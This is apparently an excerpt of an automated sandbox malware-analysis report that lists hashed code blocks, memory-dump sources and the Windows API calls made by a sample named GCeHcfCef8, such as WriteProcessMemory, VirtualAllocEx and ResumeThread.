                                                                                                  • Opcode ID: 1c236008e741be570a851082fb526fa9a47c8ee4be99195e0304a4d73a7ca754
                                                                                                  • Instruction ID: f04363cd3cc845dfc517507f11e32a9fe0924a7f1672a14478307501c802e08b
                                                                                                  • Opcode Fuzzy Hash: 1c236008e741be570a851082fb526fa9a47c8ee4be99195e0304a4d73a7ca754
                                                                                                  • Instruction Fuzzy Hash: 26912672D003199FDB20CF69C841BAEBBB2EB48714F1485AAD849B7240DB759985CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1548 18dad48-18dad57 1549 18dad59-18dad66 call 18da06c 1548->1549 1550 18dad83-18dad87 1548->1550 1557 18dad7c 1549->1557 1558 18dad68 1549->1558 1552 18dad89-18dad93 1550->1552 1553 18dad9b-18daddc 1550->1553 1552->1553 1559 18dadde-18dade6 1553->1559 1560 18dade9-18dadf7 1553->1560 1557->1550 1604 18dad6e call 18dafd0 1558->1604 1605 18dad6e call 18dafe0 1558->1605 1559->1560 1561 18dadf9-18dadfe 1560->1561 1562 18dae1b-18dae1d 1560->1562 1564 18dae09 1561->1564 1565 18dae00-18dae07 call 18da078 1561->1565 1567 18dae20-18dae27 1562->1567 1563 18dad74-18dad76 1563->1557 1566 18daeb8-18daf78 1563->1566 1569 18dae0b-18dae19 1564->1569 1565->1569 1599 18daf7a-18daf7d 1566->1599 1600 18daf80-18dafab GetModuleHandleW 1566->1600 1570 18dae29-18dae31 1567->1570 1571 18dae34-18dae3b 1567->1571 1569->1567 1570->1571 1572 18dae3d-18dae45 1571->1572 1573 18dae48-18dae51 call 18da088 1571->1573 1572->1573 1579 18dae5e-18dae63 1573->1579 1580 18dae53-18dae5b 1573->1580 1581 18dae65-18dae6c 1579->1581 1582 18dae81-18dae85 1579->1582 1580->1579 1581->1582 1584 18dae6e-18dae7e call 18da098 call 18da0a8 1581->1584 1587 18dae8b-18dae8e 1582->1587 1584->1582 1588 18daeb1-18daeb7 1587->1588 1589 18dae90-18daeae 1587->1589 1589->1588 1599->1600 1601 18dafad-18dafb3 1600->1601 1602 18dafb4-18dafc8 1600->1602 1601->1602 1604->1563 1605->1563
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 018DAF9E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: 16675ef7dd62b63514163bb84c849ac17db8b77fed81a237d24784d6d3cfa610
                                                                                                  • Instruction ID: 2b87463e634c3d3bd5bedfcb76793820c52772bf98e13c15ca911b62243686c9
                                                                                                  • Opcode Fuzzy Hash: 16675ef7dd62b63514163bb84c849ac17db8b77fed81a237d24784d6d3cfa610
                                                                                                  • Instruction Fuzzy Hash: 08710370A00B058FDB28DF2AD44475ABBF1BF88314F208A2DE44AD7B50DB75E949CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1714 18d44b0-18d59d9 CreateActCtxA 1717 18d59db-18d59e1 1714->1717 1718 18d59e2-18d5a3c 1714->1718 1717->1718 1725 18d5a3e-18d5a41 1718->1725 1726 18d5a4b-18d5a4f 1718->1726 1725->1726 1727 18d5a51-18d5a5d 1726->1727 1728 18d5a60 1726->1728 1727->1728 1730 18d5a61 1728->1730 1730->1730
                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 018D59C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: 318db04b3dd4012fa6463eb540f5ad003783b24c22dc0e5884eec9ac48b8dcad
                                                                                                  • Instruction ID: 22be891736038dce6414c58d1123db6c27d9db194c3cda284d93687955e91e68
                                                                                                  • Opcode Fuzzy Hash: 318db04b3dd4012fa6463eb540f5ad003783b24c22dc0e5884eec9ac48b8dcad
                                                                                                  • Instruction Fuzzy Hash: 2A41B3B0C0071DCBDB24DFA9C984B9EBBF5BF49304F20806AD409AB255DB755945CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1731 18d590d-18d59d9 CreateActCtxA 1733 18d59db-18d59e1 1731->1733 1734 18d59e2-18d5a3c 1731->1734 1733->1734 1741 18d5a3e-18d5a41 1734->1741 1742 18d5a4b-18d5a4f 1734->1742 1741->1742 1743 18d5a51-18d5a5d 1742->1743 1744 18d5a60 1742->1744 1743->1744 1746 18d5a61 1744->1746 1746->1746
                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 018D59C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: ae7f6d940e271a346c6c11ceaa4a798e05d2a40a4481f6b5e9c196dbfb8c7dea
                                                                                                  • Instruction ID: 622d03738a26866c231693d2e4c1569358f0c8ebfa1109969c178a0f21a1da4a
                                                                                                  • Opcode Fuzzy Hash: ae7f6d940e271a346c6c11ceaa4a798e05d2a40a4481f6b5e9c196dbfb8c7dea
                                                                                                  • Instruction Fuzzy Hash: 8241AFB0C00729CFDB24DFA9C984BDEBBB5BF49304F60806AD409AB255DB75598ACF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1747 5694040-569407c 1748 569412c-569414c 1747->1748 1749 5694082-5694087 1747->1749 1755 569414f-569415c 1748->1755 1750 5694089-56940c0 1749->1750 1751 56940da-5694112 CallWindowProcW 1749->1751 1758 56940c9-56940d8 1750->1758 1759 56940c2-56940c8 1750->1759 1752 569411b-569412a 1751->1752 1753 5694114-569411a 1751->1753 1752->1755 1753->1752 1758->1755 1759->1758
                                                                                                  APIs
                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05694101
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1347591301.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5690000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallProcWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2714655100-0
                                                                                                  • Opcode ID: 570ebab3fa9499a29f5c8af64c21ceacfe002a96a5ef46c3c73fa07458fe65e4
                                                                                                  • Instruction ID: 0e87afc3b6f9c3f46cef65adee610299e6dae8f8578cf837fa063d9c8048ff33
                                                                                                  • Opcode Fuzzy Hash: 570ebab3fa9499a29f5c8af64c21ceacfe002a96a5ef46c3c73fa07458fe65e4
                                                                                                  • Instruction Fuzzy Hash: 744109B4900309DFCB18CF99C848AAAFBF9FB98314F25C459D519A7321D775A841CFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0BF3C230
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: ae2f15e8a1f0d93279f16334c14ec0407ad498ac2bbb0f6a5630dc1eddb0fcde
                                                                                                  • Instruction ID: 2192d93a7631d487345607406f1198d12a8310046f94c75d01428497ab388267
                                                                                                  • Opcode Fuzzy Hash: ae2f15e8a1f0d93279f16334c14ec0407ad498ac2bbb0f6a5630dc1eddb0fcde
                                                                                                  • Instruction Fuzzy Hash: 2B211571D003599FCB10DFA9C885BEEBBF1FF48310F10842AE919A7240C779A945CBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0BF3C230
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: 473e861d33b6f705db147246da498d30a4584fcce9823e6a54e92c8cfba1a65d
                                                                                                  • Instruction ID: 2483c05b157e5b3a426ceb36d15dfc4f5fc767292ccfd5e2045fc5c938024187
                                                                                                  • Opcode Fuzzy Hash: 473e861d33b6f705db147246da498d30a4584fcce9823e6a54e92c8cfba1a65d
                                                                                                  • Instruction Fuzzy Hash: E52125B2D003499FCB10DFA9C885BDEBBF5FF48310F10842AE919A7240C779A944CBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018DD5F6,?,?,?,?,?), ref: 018DD6B7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: c2fb656aabf5cb0f39c8e6bb71ea55bc0954e0882e0d001dfdb1c414c39cb6fa
                                                                                                  • Instruction ID: ff540ffb5e5ae2038f2e4240e19fcd35102e58b7d15d355bf35af60f03f8111e
                                                                                                  • Opcode Fuzzy Hash: c2fb656aabf5cb0f39c8e6bb71ea55bc0954e0882e0d001dfdb1c414c39cb6fa
                                                                                                  • Instruction Fuzzy Hash: 6C21E4B5900348AFDB10DFAAD984ADEBFF4EB48310F14841AE919B3351D374A944CFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018DD5F6,?,?,?,?,?), ref: 018DD6B7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: c6ac88182befc3eae44e29d8c817b8de56d1eff0f62e44d13c4bf84cf6f1912e
                                                                                                  • Instruction ID: cc99aad4ff84224802fa100f9ef55b31e4c6c9d4b77e55d3048234745bf0f285
                                                                                                  • Opcode Fuzzy Hash: c6ac88182befc3eae44e29d8c817b8de56d1eff0f62e44d13c4bf84cf6f1912e
                                                                                                  • Instruction Fuzzy Hash: 2921E3B5900348AFDB10CFAAD985ADEBFF5EB48310F14841AE918A3350D374A944CFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0BF3C310
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1726664587-0
                                                                                                  • Opcode ID: b098047d309d511d5a17b4732c218c16e5f6c00f82c145dfc1ba2f9c836d589c
                                                                                                  • Instruction ID: a81b5b7ed68e811aea2da88622357845d13807766180ce43c4af4a6b4a25f5d2
                                                                                                  • Opcode Fuzzy Hash: b098047d309d511d5a17b4732c218c16e5f6c00f82c145dfc1ba2f9c836d589c
                                                                                                  • Instruction Fuzzy Hash: 552136B1C002499FCB10DFAAC880ADEFBF5FF48310F10842AE919A7250C7799945CBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0BF3C086
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: c08594adc56d605fe275f2690f25139a2842df35ec76fcd16b424fef688f6ee4
                                                                                                  • Instruction ID: 421cf900b4afa3680a0c5fef04b26d71c70c937257c458bc19d3e59a45226edb
                                                                                                  • Opcode Fuzzy Hash: c08594adc56d605fe275f2690f25139a2842df35ec76fcd16b424fef688f6ee4
                                                                                                  • Instruction Fuzzy Hash: CE2125B2D003498FDB10DFAAC4857EEBBF5EB48320F14842AD459A7241C7799945CFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0BF3C310
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1726664587-0
                                                                                                  • Opcode ID: 3087396177fad47e12c0243ec2fc0bdaaa6a8b9a4c9e45a429390ca4840108ea
                                                                                                  • Instruction ID: b344d9bb8a57f19bd7fe613a0fbfe6b9adcbc75ec2d30bf30154f990a0bb7562
                                                                                                  • Opcode Fuzzy Hash: 3087396177fad47e12c0243ec2fc0bdaaa6a8b9a4c9e45a429390ca4840108ea
                                                                                                  • Instruction Fuzzy Hash: D82137B1C003499FCB10DFAAC881AEEFBF5FF48310F50842AE519A7240C779A944CBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0BF3C14E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 41aafe645614263ee2fe0fbb4df51eb5ae74381ea16a6462474e3ede33a030ef
                                                                                                  • Instruction ID: ff4a0e45e595c9b7da464241e76341562ae5bd810529791ef685cf514d27d0a2
                                                                                                  • Opcode Fuzzy Hash: 41aafe645614263ee2fe0fbb4df51eb5ae74381ea16a6462474e3ede33a030ef
                                                                                                  • Instruction Fuzzy Hash: EF2159719002489FCB20DFA9C845ADEBFF5EF88310F108419D519A7250CB759945DFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018DB019,00000800,00000000,00000000), ref: 018DB22A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad
                                                                                                  • String ID:
                                                                                                  • API String ID: 1029625771-0
                                                                                                  • Opcode ID: 8ea15029175828e26c72dcb3341a9dfc1e2acc7ce4bd72c850683225312f672a
                                                                                                  • Instruction ID: 5bab84792f3da8e154270d64f6903bb7d8513a1483504e75861c0cc320c3ac5d
                                                                                                  • Opcode Fuzzy Hash: 8ea15029175828e26c72dcb3341a9dfc1e2acc7ce4bd72c850683225312f672a
                                                                                                  • Instruction Fuzzy Hash: C31112B68003099FDB10DFAAD448A9EFBF4EB49310F11842EE519B7200C375AA45CFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018DB019,00000800,00000000,00000000), ref: 018DB22A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad
                                                                                                  • String ID:
                                                                                                  • API String ID: 1029625771-0
                                                                                                  • Opcode ID: c8f062567bda1faa92bacfb1db4f1f0a18c5e5a91f45cca1e3737c994177f1cf
                                                                                                  • Instruction ID: acd4984bda306b678b56b724a8820726e5ecf7a0f32cf5cd7c49e514e520139c
                                                                                                  • Opcode Fuzzy Hash: c8f062567bda1faa92bacfb1db4f1f0a18c5e5a91f45cca1e3737c994177f1cf
                                                                                                  • Instruction Fuzzy Hash: B311E2B68003499FDB10CFAAD844A9EFBF4AB49310F11842EE519B7200C775A545CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0BF3C14E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: d12290f37ae37e486db6f7aa9b070b52d6dd7e64c2760b0c3246cbea4841657a
                                                                                                  • Instruction ID: 397b01c7bfbbc39586b7ac1d060f7c8df14d8a2c46f078b9cd94cad469be8e68
                                                                                                  • Opcode Fuzzy Hash: d12290f37ae37e486db6f7aa9b070b52d6dd7e64c2760b0c3246cbea4841657a
                                                                                                  • Instruction Fuzzy Hash: A41137729003499FCB10DFAAC845ADFBFF5EF48320F108419E519A7250C775A944DFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ResumeThread.KERNELBASE(?), ref: 0BF3BD5A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: 8a11589f33386c92efb8ca7e6530d083c2372ad6e516408eff45f26ff167cb08
                                                                                                  • Instruction ID: a17cfc8d73fc8f06faf3b521d706b378b6b43874d334cc863206ced391528480
                                                                                                  • Opcode Fuzzy Hash: 8a11589f33386c92efb8ca7e6530d083c2372ad6e516408eff45f26ff167cb08
                                                                                                  • Instruction Fuzzy Hash: DA115B71D002498FCB20DFAAD8457DEFBF5AB88310F20841AD419A7240CB75A545CF94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0BF3F581,?,?), ref: 0BF3F728
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                  • String ID:
                                                                                                  • API String ID: 2591292051-0
                                                                                                  • Opcode ID: 08a34d83b5c9402fc7cab55e30e8cc17904232f144eb932d14693b19f205c209
                                                                                                  • Instruction ID: 13e8a812bfa64bf0c5f8a8e2af6006af921299b39af6df95a4ca18abc23c500c
                                                                                                  • Opcode Fuzzy Hash: 08a34d83b5c9402fc7cab55e30e8cc17904232f144eb932d14693b19f205c209
                                                                                                  • Instruction Fuzzy Hash: 161155B2C002499FCB10DF99C444BDEBBF4EB48320F10841AD568A7340D338A944CFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0BF3F581,?,?), ref: 0BF3F728
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                  • String ID:
                                                                                                  • API String ID: 2591292051-0
                                                                                                  • Opcode ID: 0f3b12808fdbf9f74aa3c3b4c5e27d31b58660be84e9363865d2b1a2823803fc
                                                                                                  • Instruction ID: 5359ca8241603a2a984bb96d4c5ab1173ec9f19c8c446d344f98b2228528fc10
                                                                                                  • Opcode Fuzzy Hash: 0f3b12808fdbf9f74aa3c3b4c5e27d31b58660be84e9363865d2b1a2823803fc
                                                                                                  • Instruction Fuzzy Hash: 231136B6C00249DFDB20DFA9D589BEEBBF0EF48320F20845AD459A7240D778A545CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ResumeThread.KERNELBASE(?), ref: 0BF3BD5A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: a8dd50a38eaddd8986e3d94cf2d1e8534f9ae7b0f159501d51d3e80fc25c72df
                                                                                                  • Instruction ID: 0e912ad3601e555291194ae62ebd666b08817466d23d82221c231d43a0fdb523
                                                                                                  • Opcode Fuzzy Hash: a8dd50a38eaddd8986e3d94cf2d1e8534f9ae7b0f159501d51d3e80fc25c72df
                                                                                                  • Instruction Fuzzy Hash: D11136B1D042488FCB20DFAAD8457DEFBF5AB88324F24841AD419A7240CB75A944CFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 018DAF9E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1343068086.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_18d0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: 856f1d34f3474e52bbd1f594b8369722305cb56f2d963b24e7f0b32912a85b14
                                                                                                  • Instruction ID: 69b195e2df9c245078037e7fd50772c4d41d34a90c7d3a70d512e196dfb9b175
                                                                                                  • Opcode Fuzzy Hash: 856f1d34f3474e52bbd1f594b8369722305cb56f2d963b24e7f0b32912a85b14
                                                                                                  • Instruction Fuzzy Hash: DD110FB5C003498FDB14CF9AD444ADEFBF4EB88324F20845AD919B7240C379A645CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0BF3D7AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  • Opcode ID: 6beeea56a8bccfaaf2242d01a97a810bfb1051d29fa166fdef04d343d3b9747a
                                                                                                  • Instruction ID: 0328a84bc253f15e6bc802fcb2eec529d73c4f21276e8ab916d4dfd4e2ea71b9
                                                                                                  • Opcode Fuzzy Hash: 6beeea56a8bccfaaf2242d01a97a810bfb1051d29fa166fdef04d343d3b9747a
                                                                                                  • Instruction Fuzzy Hash: 961103B68003489FDB10DF9AD884BDEFBF8EB48710F208459E529B7200C375A944CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0BF3D7AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  • Opcode ID: 3496f9bbb9428305ca8c8e7bf5c520a2e88c812b4f4ffde96ef50ee29543a7da
                                                                                                  • Instruction ID: a608dd407dd54b27b601bb6b7555f5e5ef96046642b3495a5945c0b1081457a9
                                                                                                  • Opcode Fuzzy Hash: 3496f9bbb9428305ca8c8e7bf5c520a2e88c812b4f4ffde96ef50ee29543a7da
                                                                                                  • Instruction Fuzzy Hash: EC1100B58002489FDB10DF99D885BDEBBF8EB48320F20881AE559A3250C375AA44CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1342664172.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_16dd000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a6828f102aa0cb5db0f266ef0213daf07081a100ff4913a30e66d9c7b851696d
                                                                                                  • Instruction ID: 011e18ff5a8433ef29c8acbcaf68aa04cb6d70cd523a305fa7ab88e093db2499
                                                                                                  • Opcode Fuzzy Hash: a6828f102aa0cb5db0f266ef0213daf07081a100ff4913a30e66d9c7b851696d
                                                                                                  • Instruction Fuzzy Hash: CE210671905204DFDB15EF98D9C0B6ABF65FB98324F20C169E9090B39AC336E456C6A1
                                                                                                  Uniqueness

